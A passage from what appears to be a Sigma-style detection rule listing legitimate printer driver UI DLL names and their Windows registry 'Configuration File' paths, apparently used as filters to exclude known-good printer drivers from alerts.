- '\\Version-3\\Brother *\\Configuration File'\n - '\\Version-3\\FaxManager\\Configuration File'\n - '\\Version-3\\PDFCreator\\Configuration File'\n - '\\Version-3\\Xerox *\\Configuration File'\n - '\\Version-3\\Toshiba * PS3\\Configuration File' # (seen Toshiba Universal PS, Toshiba Generic Printer PS3)\n - '\\Version-3\\KONICA MINOLTA *\\Configuration File'\n - '\\Version-3\\MS Publisher *\\Configuration File' # (seen MS Publisher Color Printer, MS Publisher Imagesetter)\n - '\\Version-3\\Lexmark *\\Configuration File'\n - '\\Version-3\\HP *\\Configuration File' # (seen HP Color LaserJet 2800 Series PS)\n - '\\Version-3\\Toshiba e-STUDIO*\\Configuration File' # (seen Toshiba e-STUDIO3500c PS3)\n - '\\Version-3\\Ricoh *\\Configuration File' # (seen Ricoh Aficio MP 3500 PS / RICOH SP 3600DN PS)\n - '\\Version-3\\LANIER *\\Configuration File' # (seen LANIER SP 3600DN PS)\n - '\\Version-3\\Roland VersaWorks Dual\\Configuration File'\n - '\\Version-3\\VersaWorks\\Configuration File'\n - '\\Version-3\\PS Driver for Universal Print\\Configuration File'\n - '\\Version-3\\Wondershare PDFelement\\Configuration File'\n - '\\Version-3\\Gestetner *\\Configuration File' # (Gestetner MP CW2200 PS)\n - '\\Version-3\\Kyocera *\\Configuration File' # (Kyocera TASKalfa 5004i (KPDL))\n - '\\Version-3\\Oce PRISMAaccess Web driver\\Configuration File'\n - '\\Version-3\\TP Output Gateway PS\\Configuration File'\n - '\\Version-3\\Nitro PDF Driver *\\Configuration File' # (Nitro PDF Driver 13)\n - '\\Version-3\\CutePDF Writer v?.?\\Configuration File' # (CutePDF Writer v3.2, CutePDF Writer v4.0)\n - '\\Version-3\\uniFLOW Universal Driver\\Configuration File'\n - '\\Version-3\\ES*\\Configuration File' # (ES7170 MFP(PS))\n - '\\Version-3\\Samsung *\\Configuration File' # (Samsung ML-371x Series PS)\n - Details:\n - 'FXSUI.DLL'\n - 'FXSUI.DLL?'\n TargetObject|endswith: '\\Version-3\\Microsoft Shared Fax Driver\\Configuration File'\n - Details:\n - 'E_?UIC??E.DLL'\n - 'E_?UIC??E.DLL?'\n TargetObject|endswith: '\\Version-3\\Epson *\\Configuration File' # (Epson SX125 Series)\n - Details:\n - 'PrintConfig.dll'\n - 'PrintConfig.dll?'\n TargetObject|endswith: '\\Version-3\\Microsoft enhanced Point and Print compatibility driver\\Configuration File'\n - Details:\n - 'unidrvui.dll'\n - 'unidrvui.dll?'\n TargetObject|endswith:\n - '\\Version-3\\Webex Document Loader\\Configuration File'\n - '\\Version-3\\uniFLOW Universal PclXL Driver\\Configuration File'\n - '\\Version-3\\Send to Microsoft OneNote *\\Configuration File'\n - '\\Version-3\\HP*\\Configuration File'\n - '\\Version-3\\Toshiba *\\Configuration File'\n - '\\Version-3\\Generic / Text Only\\Configuration File'\n - '\\Version-3\\Ricoh Aficio *\\Configuration File'\n - '\\Version-3\\RICOH imagio *\\Configuration File'\n - '\\Version-3\\Xerox *\\Configuration File'\n - '\\Version-3\\Fax - HP ENVY 7640 series\\Configuration File'\n - '\\Version-3\\Snagit ?? Printer\\Configuration File'\n - '\\Version-3\\Sharp *\\Configuration File'\n - '\\Version-3\\Nuance *\\Configuration File' # (Nuance Image Printer Driver, Nuance Universal Print Driver)\n - '\\Version-3\\Kyocera *\\Configuration File'\n - '\\Version-3\\Lexmark *\\Configuration File'\n - '\\Version-3\\XPS Card Printer\\Configuration File'\n - '\\Version-3\\Canon *\\Configuration File'\n - '\\Version-3\\DYMO *\\Configuration File'\n - '\\Version-3\\NoMachine Printer\\Configuration File'\n - '\\Version-3\\Samsung *\\Configuration File' # Samsung CLP-350 Series PCL6\n - '\\Version-3\\Epson *\\Configuration File' # Epson AL-2600\n - '\\Version-3\\KONICA *\\Configuration File' # KONICA MINOLTA C353 Series XPS\n - '\\Version-3\\Dell *\\Configuration File' # Dell 2350dn Laser Printer XL\n - '\\Version-3\\Microsoft XPS Document Writer\\Configuration File'\n - '\\Version-3\\NRG *\\Configuration File' # (NRG MP C2500 PCL5c)\n - '\\Version-3\\Generic IBM *\\Configuration File' # (Generic IBM Graphics 9pin wide)\n - '\\Version-3\\Brother *\\Configuration File' # (Brother PCL5e Driver)\n - '\\Version-3\\Wildix FaxPrinter\\Configuration File'\n - '\\Version-3\\Evolis Primacy\\Configuration File'\n - Details:\n - 'CN?????.DLL' # (seen CNMUIAE.DLL, CNMUICS.DLL, CNMUIEO.DLL, cnmepui.dll, CNCAUD0.DLL)\n - 'CN??????.DLL' # (seen CNWTNMUI.DLL)\n - 'CN???MUI_D????.DLL'\n - 'CN???MUI_D????.DLL?'\n TargetObject|endswith: '\\Version-3\\Canon *\\Configuration File'\n - Details:\n - 'f??vpr_ui.dll'\n - 'f?vpr_ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\Foxit * Printer Driver\\Configuration File'\n - '\\Version-3\\Print to Evernote Driver\\Configuration File'\n - '\\Version-3\\Phantom * Driver\\Configuration File'\n - Details:\n - 'hpm?????.dll'\n - 'hpm??????.dll' # (hpm1210su.dll)\n - 'HPM????????.DLL' # (HPM1210FPSU.DLL)\n - 'hp??????.DLL' # (hpipi7th.DLL,hpltcfg6.dll)\n - 'suhp????.dll' # (suhp1020.dll)\n TargetObject|endswith: '\\Version-3\\HP *\\Configuration File'\n - Details:\n - 'rica??ui.dll'\n - 'ricu??ui.dll'\n - 'rica??us.dll'\n - '0riu0???.dll'\n TargetObject|endswith:\n - '\\Version-3\\RICOH *\\Configuration File'\n - '\\Version-3\\PCL6 Driver for Universal Print\\Configuration File'\n - '\\Version-3\\Gestetner *\\Configuration File'\n - '\\Version-3\\LANIER *\\Configuration File' # (LANIER SP 4310N PCL 6)\n - Details:\n - 'pxcdrvL.dll'\n - 'PXC?0UIf.DLL'\n - 'pxcdrv.dll'\n TargetObject|endswith: '\\Version-3\\PDF-XChange *\\Configuration File'\n - Details: 'tsprint.dll'\n TargetObject|endswith: '\\Version-3\\Remote Desktop Easy Print\\Configuration File'\n - Details: 'acpdfui???.dll'\n TargetObject|endswith:\n - '\\Version-3\\Amyuni Document Converter *\\Configuration File'\n - '\\Version-3\\AutoVue Document Converter *500\\Configuration File'\n - Details: 'KO?????C.DLL' # (KOAYXS_C.DLL, KOFXOJ1C.DLL)\n TargetObject|endswith: '\\Version-3\\KONICA MINOLTA *\\Configuration File'\n - Details:\n - 'bs??????.DLL' # (bsp15bU6.DLL)\n - 'BS?????.DLL' # (BSQ70UI.DLL)\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'EFXUI??A.DLL'\n TargetObject|endswith:\n - '\\Version-3\\Epson *\\Configuration File'\n - '\\Version-3\\Canon *\\Configuration File'\n - Details: 'BRUI???A.DLL'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details:\n - 'uh004du.dll'\n - 'uh004du.dll?'\n TargetObject|endswith: '\\Version-3\\HP Color Laser *\\Configuration File'\n - Details: 'K?UU????.DLL' # (KXUU10xm.DLL)\n TargetObject|endswith:\n - '\\Version-3\\Kyocera *\\Configuration File'\n - '\\Version-3\\KX DRIVER for Universal Printing\\Configuration File'\n - '\\Version-3\\\\????i KX\\Configuration File'\n - '\\Version-3\\\\?????i KX\\Configuration File'\n - '\\Version-3\\Universal Printing System (UTAX/TA)\\Configuration File'\n - Details:\n - 'hpb6sy????_*gui.dll'\n - 'hpbxjConfig????.dll' # (hpbxjConfig1301.dll)\n - 'hp????su.dll' # (hp1100su.dll)\n TargetObject|endswith: '\\Version-3\\HP *\\Configuration File'\n - Details: 'S??EU.DLL' # (seen SU0EU.DLL, SSOEU.DLL)\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details:\n - 'Cpxpsupdui.dll'\n - 'Cpupdui.dll'\n - 'acfpdfuiamd64.dll'\n TargetObject|endswith: '\\Version-3\\Citrix *\\Configuration File'\n - Details:\n - 'ZDesignerui.dll'\n - 'ZDNui56.dll'\n TargetObject|endswith:\n - '\\Version-3\\ZDesigner *\\Configuration File' # (ZDesigner ZD500R-300dpi ZPL, ZDesigner GK420t)\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\Zebra *\\Configuration File' # (Zebra ZP 450-200 dpi, Zebra ZP 500 (EPL))\n - Details: 'pdfprnui.dll'\n TargetObject|endswith: '\\Version-3\\\\* PDF Producer Driver\\Configuration File'\n - Details: 'pt#epl-u.d64'\n TargetObject|endswith: '\\Version-3\\POSTEK *\\Configuration File' # (POSTEK C168/300s)\n - Details: 'sht13cdu.dll'\n TargetObject|endswith: '\\Version-3\\HP Color Laser *\\Configuration File' # HP Color Laser MFP 178 179\n - Details: 'KMREDrvUI.DLL' # K Comer\n TargetObject|endswith:\n - '\\Version-3\\RX416\\Configuration File'\n - '\\Version-3\\RE418\\Configuration File'\n - '\\Version-3\\CX418\\Configuration File'\n - '\\Version-3\\RX106F\\Configuration File'\n - Details: 'znsprnui.dll'\n TargetObject|endswith: '\\Version-3\\DocuCom PDF Driver\\Configuration File'\n - Details: 'udcdrv.dll'\n TargetObject|endswith: '\\Version-3\\Universal Document Converter\\Configuration File'\n - Details: 'us008du.dll'\n TargetObject|endswith: '\\Version-3\\Samsung Universal Print Driver*\\Configuration File'\n - Details:\n - 'eng53Ku.DLL'\n - 'GXE6???.DLL' # (GXE6KAU.DLL)\n - 'GXE6??.DLL' # (GXE6MU.DLL, GXE6NU.DLL)\n TargetObject|endswith: '\\Version-3\\RICOH *\\Configuration File'\n - Details: 'Seagull_V3_ConfigDispatcher.dll'\n TargetObject|endswith:\n - '\\Version-3\\Brady *\\Configuration File'\n - '\\Version-3\\TEC *\\Configuration File' # (TEC B-SX4T (203 dpi))\n - '\\Version-3\\Intermec *\\Configuration File' # (Intermec PM43c (203 dpi))\n - '\\Version-3\\EasyCoder *\\Configuration File' # (EasyCoder PF4i (203 dpi) - DP)\n - Details: 'CRDGUI.DLL'\n TargetObject|endswith: '\\Version-3\\CP Printer\\Configuration File'\n - Details: 'fra????.DLL'\n TargetObject|endswith:\n - '\\Version-3\\Gestetner *\\Configuration File' # fra56Gu.DLL\n - '\\Version-3\\RICOH *\\Configuration File' # fra50Fu.DLL\n - '\\Version-3\\LANIER *\\Configuration File' # fra53Ku.DLL\n - Details: 'GPCUTUI64.DLL'\n TargetObject|endswith: '\\Version-3\\Graphtec *\\Configuration File'\n - Details: 'ss#???-u.d64' # (ss#tec-u.d64, ss#tsc-u.d64)\n TargetObject|endswith:\n - '\\Version-3\\TEC *\\Configuration File' # (TEC B-SX4)\n - '\\Version-3\\Brady *\\Configuration File' # (Brady BBP11-34L)\n - Details: 'do#dpl-u.d64'\n TargetObject|endswith: '\\Version-3\\Datamax*\\Configuration File' # (Datamax-O'Neil E-4205A Mark III)\n - Details: 'CWBAFPUI.DLL'\n TargetObject|endswith: '\\Version-3\\IBM *\\Configuration File' # (IBM Infoprint 2085 AFP)\n - Details: 'RIC????.DLL' # (RIC66Ku.DLL, RIC643u.DLL)\n TargetObject|endswith:\n - '\\Version-3\\E-22C *\\Configuration File' # (E-22C PCL 6)\n - '\\Version-3\\RICOH *\\Configuration File' # (RICOH Aficio SP 8100DN PCL 6)\n - Details: 'vspdfui.dll'\n TargetObject|endswith: '\\Version-3\\Visage PDF\\Configuration File'\n - Details: 'dellopd.uiproxy.dll'\n TargetObject|endswith: '\\Version-3\\Dell *\\Configuration File' # (Dell Open Print Driver (PCL 5))\n - Details: 'sznprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\PowerPDF\\Configuration File'\n - '\\Version-3\\NuancePDF\\Configuration File'\n - Details:\n - 'OPPQ_UI.DLL'\n - 'OK?????.DLL' # (OKBBAPG.DLL, OKXLUI2.DLL, OKBL_UI.DLL)\n - 'OPAM_UI.DLL'\n TargetObject|endswith:\n - '\\Version-3\\OKI *\\Configuration File' # (OKI C9850(PCL), OKI B710n(PCL))\n - '\\Version-3\\ES*\\Configuration File' # (ES7131(PCL))\n - Details: 'TPPrnUI.DLL'\n TargetObject|endswith: '\\Version-3\\TP Output Gateway\\Configuration File'\n - Details: 'MDP???????.DLL' # (MDPS5UIx64.DLL)\n TargetObject|endswith: '\\Version-3\\MailevaDirect\\Configuration File'\n - Details: 'th-2500ui.dll'\n TargetObject|endswith: '\\Version-3\\TH-2500\\Configuration File'\n - Details: 'JgUI.DLL'\n TargetObject|endswith: '\\Version-3\\Zebra *\\Configuration File' # (Zebra ZC150 USB Card Printer)\n - Details: 'Bravo2_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher II\\Configuration File'\n - Details: 'PT_DPPro_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher Pro Xi\\Configuration File'\n - Details: 'PT_DPPro_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher Pro Xi\\Configuration File'\n - Details: 'in#idp-u.d64'\n TargetObject|endswith:\n - '\\Version-3\\Intermec *\\Configuration File' # (Intermec PM43c (300 dpi))\n - '\\Version-3\\EasyCoder *\\Configuration File' # (EasyCoder PF4i (203 dpi) - DP)\n - Details: 'novaui?.dll'\n TargetObject|endswith: '\\Version-3\\novaPDF ?\\Configuration File'\n - Details: 'G2PrintUPDUI_x64.dll'\n TargetObject|endswith: '\\Version-3\\GoToMyPC UPD Driver\\Configuration File'\n - Details:\n - 'pdfsam enhanced_pdfprnui_v*.dll' # (pdfsam enhanced_pdfprnui_v.6.11.0.7.dll)\n - 'brand_solution_name_pdfprnui_v*.dll' # (brand_solution_name_pdfprnui_v.6.11.0.7.dll)\n - 'suite_pdfprnui_v*.dll' # (suite_pdfprnui_v.4.12.26.3.dll)\n - 'soda_pdfprnui_v*.dll' # (soda_pdfprnui_v.pdf architect_pdfprnui_v.4.12.26.3.dll6.11.0.7.dll)\n - 'architect_pdfprnui_v*.dll' # (architect_pdfprnui_v.4.12.26.3.dll)'\n - 'pdf architect_pdfprnui_v*.dll' # (pdf architect_pdfprnui_v.4.12.26.3.dll)\n TargetObject|endswith:\n - '\\Version-3\\PDFsam Enhanced *\\Configuration File'\n - '\\Version-3\\PDF Architect *\\Configuration File' # (PDF Architect 7 Driver, PDF Architect 8 Driver)\n - '\\Version-3\\PDF Suite *\\Configuration File' # (PDF Suite 2020 Driver)\n - '\\Version-3\\Soda PDF *\\Configuration File' # (Soda PDF Desktop 12 Driver)\n - Details: 'ss??mdu.dll' # (ssi5mdu.dll, ssk4mdu.dll, ssp5mdu.dll, ssi2mdu.dll, ssk4mdu.dll)\n TargetObject|endswith: '\\Version-3\\Samsung * Series*\\Configuration File'\n - Details: 'OKC??EUI.DLL'\n TargetObject|endswith: '\\Version-3\\OKI C*\\Configuration File'\n - Details: 'ps5ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\7-pdf printer\\Configuration File'\n - '\\Version-3\\bluefilesprinter\\Configuration File'\n - '\\Version-3\\canon *\\Configuration File'\n - '\\Version-3\\communicationsclients fax driver\\Configuration File'\n - '\\Version-3\\custpdf writer*\\Configuration File'\n - '\\Version-3\\dell laser printer 1720dn ps3\\Configuration File'\n - '\\Version-3\\driverbee-*\\Configuration File'\n - '\\Version-3\\edocprintpro\\Configuration File'\n - '\\Version-3\\Epson * series\\Configuration File'\n - '\\Version-3\\ezeep ps5 printer\\Configuration File'\n - '\\Version-3\\fx docucentre-vii c3372 ps\\Configuration File'\n - '\\Version-3\\Generic *\\Configuration File'\n - '\\Version-3\\ghostscript pdf\\Configuration File'\n - '\\Version-3\\icanopee printer\\Configuration File'\n - '\\Version-3\\ixbusprintdriver\\Configuration File'\n - '\\Version-3\\oki b431(ps)\\Configuration File'\n - '\\Version-3\\oki c531(ps)\\Configuration File'\n - '\\Version-3\\output manager universal ps driver\\Configuration File'\n - '\\Version-3\\papercut global postscript\\Configuration File'\n - '\\Version-3\\pdf architect driver\\Configuration File'\n - '\\Version-3\\pdf redirect pro\\Configuration File'\n - '\\Version-3\\pdfcamp printer driver\\Configuration File'\n - '\\Version-3\\primopdf\\Configuration File'\n - '\\Version-3\\pro c7500 *\\Configuration File'\n - '\\Version-3\\riso c*\\Configuration File'\n - '\\Version-3\\Sharp *\\Configuration File'\n - '\\Version-3\\siemens se pdf driver\\Configuration File'\n - '\\Version-3\\srciprintdriver\\Configuration File'\n - '\\Version-3\\ta classic universaldriver kpdl\\Configuration File'\n - '\\Version-3\\Toshiba universal fax\\Configuration File'\n - '\\Version-3\\vmware postscript *\\Configuration File'\n - '\\Version-3\\vnc printer (ps)\\Configuration File'\n - '\\Version-3\\waters unifi printer\\Configuration File'\n - '\\Version-3\\zwcad virtual eps driver 1.0\\Configuration File'\n - Details: 'unidrvui.dll'\n TargetObject|endswith:\n - '\\Version-3\\3d systems cube 3\\Configuration File'\n - '\\Version-3\\5006ci\\Configuration File'\n - '\\Version-3\\activefax\\Configuration File'\n - '\\Version-3\\adis driver\\Configuration File'\n - '\\Version-3\\aures odp333\\Configuration File'\n - '\\Version-3\\badgy200\\Configuration File'\n - '\\Version-3\\boca bidi fgl 26/46 300 dpi\\Configuration File'\n - '\\Version-3\\bolt pdf\\Configuration File'\n - '\\Version-3\\cab-eos5/200\\Configuration File'\n - '\\Version-3\\cab-xc q6.3/300\\Configuration File'\n - '\\Version-3\\citizen ct-s310ii\\Configuration File'\n - '\\Version-3\\color label 2000\\Configuration File'\n - '\\Version-3\\delcop universal v2 xl\\Configuration File'\n - '\\Version-3\\e-studio Generic printer hbp\\Configuration File'\n - '\\Version-3\\everyoneprint universal print driver v2\\Configuration File'\n - '\\Version-3\\evolis *\\Configuration File'\n - '\\Version-3\\fax - hp officejet *\\Configuration File'\n - '\\Version-3\\ff apeos c3570 pcl 6\\Configuration File'\n - '\\Version-3\\fx apeosport *\\Configuration File'\n - '\\Version-3\\fx docucentre *\\Configuration File'\n - '\\Version-3\\ibm infoprint 1000 series\\Configuration File'\n - '\\Version-3\\idp smart-51 card printer\\Configuration File'\n - '\\Version-3\\ip-s\\Configuration File'\n - '\\Version-3\\m08f printer\\Configuration File'\n - '\\Version-3\\m110s printer\\Configuration File'\n - '\\Version-3\\munbyn itpp941\\Configuration File'\n - '\\Version-3\\netphone fax druckertreiber\\Configuration File'\n - '\\Version-3\\oki *\\Configuration File'\n - '\\Version-3\\pagemanager pdf writer\\Configuration File'\n - '\\Version-3\\pm-241-bt\\Configuration File'\n - '\\Version-3\\pos-80c\\Configuration File'\n - '\\Version-3\\riso sf 5x30eii series\\Configuration File'\n - '\\Version-3\\smart notebook document writer\\Configuration File'\n - '\\Version-3\\star tsp*\\Configuration File'\n - '\\Version-3\\teamviewer printer\\Configuration File'\n - '\\Version-3\\thermal receipt #1\\Configuration File'\n - '\\Version-3\\universal laser printer\\Configuration File'\n - '\\Version-3\\universal print driver for cloud\\Configuration File'\n - '\\Version-3\\varioprint 135 pcl6 fr\\Configuration File'\n - '\\Version-3\\vnc printer (ud)\\Configuration File'\n - '\\Version-3\\xm fax\\Configuration File'\n - '\\Version-3\\zvprt?\\Configuration File'\n - Details:\n - 'us???du.dll'\n - 'up???du.dll'\n - 'spep6du.dll'\n TargetObject|endswith: '\\Version-3\\samsung *\\Configuration File'\n - Details: 'dwprinter.dll'\n TargetObject|endswith: '\\Version-3\\docuware printer driver\\Configuration File'\n - Details: 'brumfa5a.dll'\n TargetObject|endswith: '\\Version-3\\Brother * printer\\Configuration File'\n - Details: 'e_32ulc1ae.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t7200 series\\Configuration File'\n - Details: 'gznprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\gaaiho pdf\\Configuration File'\n - '\\Version-3\\nuance pdf\\Configuration File'\n - Details: 'e_32ulc1be.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t5200 series\\Configuration File'\n - Details: 'novauik7.dll'\n TargetObject|endswith: '\\Version-3\\novapdf 7 printer driver\\Configuration File'\n - Details: 'satov6ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\sato gl408e\\Configuration File'\n - '\\Version-3\\sato ct408i\\Configuration File'\n - Details: 'solidui3.dll'\n TargetObject|endswith: '\\Version-3\\solid pdf creator\\Configuration File'\n - Details: 'seagull_v3_configdispatcher.dll'\n TargetObject|endswith:\n - '\\Version-3\\avery adtp1ef (300 dpi) - mpcl\\Configuration File'\n - \"\\\\Version-3\\\\datamax-o'neil m-4206 mark ii\\\\Configuration File\"\n - '\\Version-3\\godex g300\\Configuration File'\n - '\\Version-3\\godex zx1300i\\Configuration File'\n - '\\Version-3\\honeywell *\\Configuration File'\n - '\\Version-3\\monarch 9416tt3 xl (300 dpi)\\Configuration File'\n - '\\Version-3\\thermotex tt-3\\Configuration File'\n - '\\Version-3\\Toshiba b-fv4 (203 dpi)\\Configuration File'\n - '\\Version-3\\Toshiba ba400 (203 dpi)\\Configuration File'\n - '\\Version-3\\tsc *\\Configuration File'\n - '\\Version-3\\zebra *\\Configuration File'\n - Details: 'okx058ui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'lmiprinterui.dll'\n TargetObject|endswith: '\\Version-3\\logmein printer driver\\Configuration File'\n - Details: 'bruhla3d.dll'\n TargetObject|endswith: '\\Version-3\\Brother hl-6050 series\\Configuration File'\n - Details: 'eskmf64ui.dll'\n TargetObject|endswith: '\\Version-3\\esker mf printer driver\\Configuration File'\n - Details: 'su?hu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp mx-*\\Configuration File'\n - Details: 'tht_80ui.dll'\n TargetObject|endswith: '\\Version-3\\printer tht 8.0\\Configuration File'\n - Details: 'inf619u.dll'\n TargetObject|endswith: '\\Version-3\\infotec is 2220d pcl 6\\Configuration File'\n - Details: 'nrg611u.dll'\n TargetObject|endswith: '\\Version-3\\nrg dsm415 pcl 6\\Configuration File'\n - Details: 'ophp_ui.dll'\n TargetObject|endswith: '\\Version-3\\oki c310\\Configuration File'\n - Details: 'koaxjjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-0iseriespcl\\Configuration File'\n - Details: 'koaxmjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-0iseriespcl\\Configuration File'\n - Details:\n - 'koaxgjac.dll'\n - 'koaxcjac.dll'\n - 'koax1jac.dll'\n - 'koax7jac.dll'\n - 'koawujac.dll'\n - 'kobs4jac.dll'\n - 'kobsbjac.dll'\n - 'koaxpjac.dll'\n - 'koax3jac.dll'\n - 'koaytjac.dll'\n - 'koaxgsac.dll'\n - 'koaxojac.dll'\n - 'koayxjac.dll'\n - 'koaytsac.dll'\n - 'koayfjac.dll'\n - 'koaxysac.dll'\n - 'koaxdjac.dll'\n - 'kobs8jac.dll'\n TargetObject|endswith: '\\Version-3\\Generic *\\Configuration File'\n - Details: 'edocpdfu.dll'\n TargetObject|endswith: '\\Version-3\\edocprinter pdf pro\\Configuration File'\n - Details: 'unidrvui_apct.dll'\n TargetObject|endswith: '\\Version-3\\apicrypt\\Configuration File'\n - Details: 'e_32ulc1de.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t7200d series\\Configuration File'\n - Details: 'okx055ui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'rici7qui.dll'\n TargetObject|endswith: '\\Version-3\\ricoh *\\Configuration File'\n - Details: 'dlxriziu.dll'\n TargetObject|endswith: '\\Version-3\\dell 2130cn color laser pcl6\\Configuration File'\n - Details: 'koaycjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-9seriespcl\\Configuration File'\n - Details: 'eapuif7.dll'\n TargetObject|endswith: '\\Version-3\\Epson *\\Configuration File'\n - Details: 'AppliDisvirtualprinterdriverui.dll'\n TargetObject|endswith: '\\Version-3\\AppliDis virtual printer\\Configuration File'\n - Details: 'cboui56.dll'\n TargetObject|endswith: '\\Version-3\\cab *\\Configuration File'\n - Details: 'cabui.dll'\n TargetObject|endswith: '\\Version-3\\cab *\\Configuration File'\n - Details: 'epobw9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m300 advanced\\Configuration File'\n - Details: 'e_2uic1w5e.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-c879r series pcl6\\Configuration File'\n - Details: 'sha7mdu.dll'\n TargetObject|endswith: '\\Version-3\\hp laserjet mfp m437-m443 pcl6\\Configuration File'\n - Details: 'rictw0ui.dll'\n TargetObject|endswith: '\\Version-3\\lan-fax Generic\\Configuration File'\n - Details: 'pxc50uiaf15.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange 5.0 for finereader 15\\Configuration File'\n - Details: 'pixelplanetpdui7.dll'\n TargetObject|endswith: '\\Version-3\\pixelplanet pdfprinter 7\\Configuration File'\n - Details: 'rc40jui.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor ft5230\\Configuration File'\n - Details: 'esrl6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio2809aseries pcl6\\Configuration File'\n - Details: 'bruhla5a.dll'\n TargetObject|endswith: '\\Version-3\\Brother hl-5250dn series\\Configuration File'\n - Details: 'kvpui64.dll'\n TargetObject|endswith: '\\Version-3\\kingsoft virtual printer driver\\Configuration File'\n - Details: 'kmuu84h5.dll'\n TargetObject|endswith:\n - '\\Version-3\\p-4025w mfp kx\\Configuration File'\n - '\\Version-3\\p-5534dn kx\\Configuration File'\n - Details: 'gfe6au.dll'\n TargetObject|endswith: '\\Version-3\\ricoh aficio sp c242sf pcl 6\\Configuration File'\n - Details: 'su3hu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'novaui11.dll'\n TargetObject|endswith: '\\Version-3\\novapdf 11\\Configuration File'\n - Details: 'sdo1mdu.dll'\n TargetObject|endswith: '\\Version-3\\dell 1133 laser mfp gdi\\Configuration File'\n - Details: 'e1yuicbee.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-2950 series\\Configuration File'\n - Details: 'sht12cdu.dll'\n TargetObject|endswith: '\\Version-3\\hp color laser 150\\Configuration File'\n - Details: 'varm611drvui.dll'\n TargetObject|endswith: '\\Version-3\\m611\\Configuration File'\n - Details: 'k?uu????.dll'\n TargetObject|endswith:\n - '\\Version-3\\olivetti *\\Configuration File'\n - '\\Version-3\\p-*\\Configuration File'\n - '\\Version-3\\cd-*\\Configuration File'\n - '\\Version-3\\cdc *\\Configuration File'\n - '\\Version-3\\\\* nw-fax\\Configuration File'\n - Details: 'spe__du.dll'\n TargetObject|endswith: '\\Version-3\\samsung universal print driver 2\\Configuration File'\n - Details: 'ss0xu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'bru?????.dll'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'ql106nui.dll'\n TargetObject|endswith: '\\Version-3\\Brother ql-1060n\\Configuration File'\n - Details: 'kobkajac.dll'\n TargetObject|endswith: '\\Version-3\\bw 400-0i pcl\\Configuration File'\n - Details: 'dopdfui7.dll'\n TargetObject|endswith: '\\Version-3\\dopdf 7 printer driver\\Configuration File'\n - Details: 'dtc1250eui.dll'\n TargetObject|endswith: '\\Version-3\\dtc1250e card printer\\Configuration File'\n - Details: 'eapcuif7.dll'\n TargetObject|endswith: '\\Version-3\\Epson cgenerator(180dpi)\\Configuration File'\n - Details: 'shm4mdu.dll'\n TargetObject|endswith: '\\Version-3\\hp laser mfp 131 133 135-138\\Configuration File'\n - Details: 'okx05hui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'rici7jui.dll'\n TargetObject|endswith: '\\Version-3\\ricoh im c3510 jpn rpcs\\Configuration File'\n - Details: 'eng53zu.dll'\n TargetObject|endswith: '\\Version-3\\ricoh p 501 pcl 5e\\Configuration File'\n - Details: 'drvui_x64_oxhoo.dll'\n TargetObject|endswith: '\\Version-3\\tp??\\Configuration File'\n - Details: 'sxa7mdu.dll'\n TargetObject|endswith: '\\Version-3\\xerox workcentre 3225\\Configuration File'\n - Details: 'ss#zpl-u.d64'\n TargetObject|endswith: '\\Version-3\\zebra *\\Configuration File'\n - Details: 'varbmp61drvui.dll'\n TargetObject|endswith: '\\Version-3\\bmp61\\Configuration File'\n - Details: 'briu???.dll'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'pt????.dll'\n TargetObject|endswith: '\\Version-3\\Brother pt*\\Configuration File'\n - Details: 'ptql????.dll'\n TargetObject|endswith: '\\Version-3\\Brother ql-*\\Configuration File'\n - Details: 'ocewpd2pui.dll'\n TargetObject|endswith:\n - '\\Version-3\\oce *\\Configuration File'\n - '\\Version-3\\canon colorwave *\\Configuration File'\n - Details: 'ss#ipl-u.d64'\n TargetObject|endswith: '\\Version-3\\easycoder *\\Configuration File'\n - Details: 'eptbk9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m1200 advanced\\Configuration File'\n - Details: 'e_puicafw.dll'\n TargetObject|endswith: '\\Version-3\\Epson pp-100nprn\\Configuration File'\n - Details: 'e_2uic1cie.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-m5399 series pcl6\\Configuration File'\n - Details: 'okc04eui.dll'\n TargetObject|endswith: '\\Version-3\\es????(pcl)\\Configuration File'\n - Details: 'brand_solution_name_pdfprnui_v*.dll'\n TargetObject|endswith: '\\Version-3\\expert pdf 15 driver\\Configuration File'\n - Details: 'sh?????.dll'\n TargetObject|endswith: '\\Version-3\\hp laser *\\Configuration File'\n - Details: 'tep39pui.dll'\n TargetObject|endswith: '\\Version-3\\king jim *\\Configuration File'\n - Details: 'ricfax64ui.dll'\n TargetObject|endswith: '\\Version-3\\lan-fax m*\\Configuration File'\n - Details: 